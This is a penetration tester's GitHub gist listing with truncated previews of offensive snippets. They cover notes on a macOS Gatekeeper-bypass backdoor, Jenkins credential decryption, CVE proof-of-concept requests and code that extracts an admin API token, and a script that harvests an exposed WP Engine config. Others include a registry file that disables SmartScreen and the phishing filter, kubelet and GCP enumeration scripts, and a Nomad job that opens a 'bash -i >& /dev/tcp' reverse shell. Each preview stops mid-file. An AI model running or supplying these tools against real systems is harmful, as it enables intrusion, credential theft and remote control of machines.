Chris Gates carnal0wnage
carnal0wnage
/ Preparación OSCP.md
Created
February 28, 2019 18:53
— forked from s4vitar/Preparación OSCP.md
carnal0wnage
/ Backdoor Notes
Created
February 28, 2019 18:45
— forked from milo2012/Backdoor Notes
Backdoor Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Creating signed and customized backdoored macOS applications by abusing Apple Developer tools | |
| https://medium.com/@adam.toscher/creating-signed-and-customized-backdoored-macos-applications-by-abusing-apple-developer-tools-b4cbf1a98187 | |
| Notes: | |
| Include 1) 1Password 7.app (Gatekeeper Approved) 2) StuffIt Expander.app/Backdoor (Not Approved) in /tmp/apps. You will be allowed to run both 1) and 2) (Gatekeeper bypass) | |
| Alternative one liner: | |
| $ pkgbuild --root /tmp/apps --identifier com.microsoft --install-location /Applications mypackage.pkg |
carnal0wnage
/ decrypt.py
Created
February 28, 2019 15:20
slightly modified https://github.com/tweksteen/jenkins-decrypt/blob/master/decrypt.py because it was throwing a bytes/string error - change is line 55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import re | |
| import sys | |
| import base64 | |
| from hashlib import sha256 | |
| from binascii import hexlify, unhexlify | |
| from Crypto.Cipher import AES | |
| MAGIC = b"::::MAGIC::::" |
carnal0wnage
/ gist:fad7c95492224e609ddc47fb08ac8438
Created
February 28, 2019 00:46
Jenkins - SECURITY-180/CVE-2015-1814 PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1 | |
| Host: 10.0.0.160 | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0 | |
| Accept: text/javascript, text/html, application/xml, text/xml, */* | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| X-Requested-With: XMLHttpRequest | |
| X-Prototype-Version: 1.7 | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Referer: https://10.0.0.160:8080/asynchPeople/ |
carnal0wnage
/ gist:1f316c01eaa7707c3cc6497ef04857a8
Last active
February 28, 2019 00:02
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3 | |
| import jenkins.security.* | |
| //j.jenkins.setSecurityRealm(j.createDummySecurityRealm()); | |
| User u = User.get("admin") | |
| ApiTokenProperty t = u.getProperty(ApiTokenProperty.class) | |
| def token = t.getApiToken() | |
| //token.getClass() | |
| println "token is $token " |
carnal0wnage
/ wpeprivate-config.sh
Created
February 21, 2019 00:02
— forked from hateshape/wpeprivate-config.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies. | |
| # If it "no worked" (Technical Term) then you probably need to install jq! | |
| TARGET=$1 | |
| TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3) | |
| # Pretty Colors | |
| RESET='\033[00m' | |
| GREEN='\033[01;32m' |
carnal0wnage
/ gist:ff2b86ee166f504eaac362d5dece3529
Created
February 14, 2019 03:44
from https://twitter.com/icommitfelonies/status/1095797379133919232
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REGEDIT4 | |
| ; @ECHO OFF | |
| ; CLS | |
| ; REGEDIT.EXE /S "%~f0" | |
| ; EXIT | |
| [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer] | |
| "SmartScreenEnabled"="Off" | |
| [HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter] | |
| "EnabledV9"=dword:00000000 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost] |
carnal0wnage
/ kubelet-find.sh
Created
January 8, 2019 19:55
bash script to open file of IPs and looks for unsecure k8 API (10250)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for a in $(cat kube-gke.txt); do | |
| echo $a; | |
| curl --insecure https://$a:10250/runningpods "; | |
| echo ""; | |
| echo ""; | |
| done |
carnal0wnage
/ gcp_enum.sh
Last active
January 24, 2024 18:06
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # gcloud auth activate-service-account --key-file=85.json | |
| # gcloud projects list | |
| project="my-project" | |
| space="" | |
| echo "gcloud auth list" | |
| gcloud auth list | |
| echo -e "$space" |
carnal0wnage
/ sploit_service_revshell.hcl
Created
December 18, 2018 16:35
hcl file to get a reverse shell from the nomad server via raw_exec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| job "sploit_service_revshell" { | |
| datacenters = ["dc1"] | |
| group "sploit" { | |
| task "shello" { | |
| driver = "raw_exec" | |
| config { | |
| command = "/bin/bash" | |
| args = ["-c", "bash -i >& /dev/tcp/10.0.0.8/8888 0>&1"] | |
| } |